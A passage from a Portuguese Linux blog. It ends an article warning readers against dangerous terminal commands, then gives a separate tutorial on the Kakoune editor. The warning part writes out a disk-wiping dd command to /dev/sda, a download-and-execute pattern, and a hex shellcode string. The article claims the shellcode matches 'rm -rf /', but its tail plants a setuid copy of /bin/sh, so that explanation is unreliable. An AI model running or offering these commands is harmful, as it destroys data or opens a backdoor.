Este comando vai aparecer para você instalar alguns programas. O wget é o programa responsável por fazer o download da URL que vem logo após, ele é bem útil para baixar arquivos em geral, o problema está no arquivo que ele baixa e na sequência do comando  que o executa no caso dele ser um shell script. Só baixe arquivos desta forma de fontes que você considera confiáveis e se estiver na dúvida, baixe apenas o arquivo de shell, eliminando qualquer parâmetro que apareça após o link, assim você pode abrir ele em um editor de texto de sua preferência e verificar o que há dentro dele.

6 - dd if=/dev/random of=/dev/sda


Assim como o ítem 3 da nossa lista, o grande problema aqui é o destino ser o /dev/sda. Tome cuidado. O comando dd pode ser muito útil para copiar arquivos e até mesmo partições inteiras, como no exemplo 6, mas se a saída for um outro disco, tome cuidado, pois o resultado irá sobrepor os dados lá existentes.

7 - Comandos disfarçados


Como eu comentei à princípio, o terminal é uma ferramenta poderosa, se você não dominá-lo, é bom ter cuidado com que você for rodar nele, se o você não fala a língua do terminal, saiba que ele fala muitas outras. O comando abaixo nada mais é do que o comando indicado no primeiro item da nossa lista, só que em forma hexadecimal.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Ele tem o mesmo propósito do famigerado "rm -rf /", por isso, não rode coisas no terminal que você não sabe para quem servem, existem muito conteúdo grátis a internet para você estudar sobre e até mesmo alguns bons cursos pagos, como é o caso do "Dominando o Terminal" aqui do blog mesmo, mas em linhas gerais, se você evitar colocar comandos que você não sabe para que servem direito, os problemas já serão minimizados. 

Agora espalhe este conhecimento para ajudar mais pessoas a ficarem precavidas sobre estes pequenos percalços da vida computacional.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Conheça o Kakoune, um Vim fácil de usar

Nenhum comentário
O Vim é um clássico do mundo Linux, um editor de texto muito poderoso e usado por diversas pessoas ao redor do mundo, mas ele, apesar de muito bom, não é a única opção. Desconsiderando o Emacs, Nano, e alguns outros, também bem populares, hoje você vai conhecer o interessantíssimo, Kakoune.

Kakoune
















Kakoune é um editor de texto inspirado no Vim que possui comandos similares e de uso mais intuitivo. Ele possui um sistema de ajuda interativa, o xclip que é baseado no famoso Clippy do Microsoft Office e de outros aplicativos.

O Kakoune está no repositório de todas as distribuições Linux e em outros sistemas: FreeBSD, OpenBSD, macOS, Windows e entre outros. Então para instalá-lo não há segredo, basta rodar o comando de instalação do gerenciador de pacotes do seu sistema. Exemplo para Debian, Ubuntu e Mint:
sudo apt install kakoune

Utilização


Como foi dito acima, os comandos do Kakoune são similares ao do Vim. Para você abrir ou criar um arquivo, basta rodar o comando kak arquivo. Ele terá o modo de inserção (pressione a tecla i para começar a digitar) e para sair e salvar (pressione ESC e em seguinda tecle :wq) . Se quiser só salvar [ESC] :w e se quiser sair sem salvar [ESC] :q!

Configuração


Para o obter ajuda do Kakoune, basta teclar a letra 'q' ou 'Q' em maiúsculo . Abrirá o ajudante (Clippy) para lhe dar algumas dicas, veja a imagem abaixo:

Obtendo ajuda do Clippy


Kakoune

Teclando i para digitar o texto:

Teclando i para digitar o texto


Pressionei ESC e depois digitei :wq

Perceba que além do Clippy , agora também tem uma barra branca que me orienta quais comandos utilizar . Eu poderia ainda pressionar a tecla TAB que o Kakoune iria navegar nessas opções e escrever o comandos para mim, como há na imagem logo abaixo.

Pressionei ESC e depois digitei :wq

Pressionando TAB e navegando nas opções:

Pressionando TAB e navegando nas opções:


Customizando seu Kakoune


Você pode numerar as linhas , alterar o tema de cores e entre várias outras formas . Se você pressionar ESC ':' (dois pontos) perceba que ele já lhe orienta sobre os comandos.

Kakoune

Se você quiser numerar as linhas o comando é (comece a digitar o comando e use o TAB para facilitar):
add-highlighter global/ number_lines
Kakoune

Para mudar o tema de cores:
colorscheme [tema_que_você_deseja]
Kakoune

E muitos outros comandos que você mesmo pode notar no menu suspenso. Mas quando você fechar o Kakoune, essas configurações serão perdidas , mas você pode tornar essas alterações definitivas criando um diretório de nome kak dentro do diretório .config na raíz do seu usuário, veja o comando:
mkdir -p ~/.config/kak
E depois crie o um arquivo de nome kakrc e coleque os mesmos comandos que você utilizou dentro do arquivo, assim:
kak .config/kak/kakrc
Tecle i para entrar no modo de inserção ( insert ) e cole esse conteúdo nele, supondo que você deseja esse tema:
add-highlighter global/ number_lines
colorscheme [tema_que_você_escolheu]
Não esqueça de salvar antes de sair [ESC]:wq ou [ESC]:write-quit como o próprio Kakoune sugere .
Pronto, agora é só abrir o Kakoune e as configurações não serão perdidas. O diretório raíz de configurações do Kakoune é em /usr/share/kak/ , dentro dele tem arquivos .kak que são sintaxes para diversas linguagens de programação e entre outros arquivos e diretórios, que é uma boa ideia analizar.

E por falar em boa ideia, não deixe de consultar a wiki oficial do Kakoune no endereço: https://github.com/mawww/kakoune/wiki que tem diversas dicas bem bacanas e se quiser utilizar um kakrc com diversas configurações já inclusas , copie desse endereço:

Você notou a semelhança com o Vim, caso deseje obter dicas do Vim que servirão pro seu Kakoune, clique nesse link: 7 dicas para você usar o VIM como um PRO.

Página oficial do Kakoune: http://kakoune.org/

Este artigo foi escrito em conjunto com Marcos, do Terminal Root.

Abraços!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Blog Diolinux © all rights reserved
made with by templateszoo